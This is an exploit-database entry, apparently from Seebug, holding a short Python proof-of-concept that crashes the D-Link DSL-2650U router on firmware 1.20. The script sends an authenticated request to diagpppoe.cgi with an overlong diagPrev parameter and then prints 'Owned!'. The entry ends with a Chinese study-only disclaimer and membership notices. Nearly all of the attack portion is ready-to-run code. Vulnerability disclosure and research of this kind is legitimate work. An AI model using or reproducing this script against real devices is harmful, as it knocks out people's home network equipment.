# Exploit Title: Dlink DSL-2650U DoS/PoC # Date: July 6th, 2011 # Author: Li'el Fridman # Software Link: ftp://ftp.dlink.ru/pub/ADSL/DSL-2650U_BRU_D/Firmware/RU_1.20/DSL-2650U_BRU_D1_RU_1.20_06222011.zip # Version: 1.20 # Tested on: Default firmware - Linux 2.6.8.1 #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import os import urllib ip = raw_input('Please enter the router address: ') username = raw_input('Please enter the router user name: ') password = raw_input('Please enter the router password: ') path = 'http://{0}:{1}@{2}/diagpppoe.cgi?diagPrev=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.format(username, password, ip) print 'Trying {0}'.format(path) opener = urllib.urlopen(path) print 'Owned!'
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论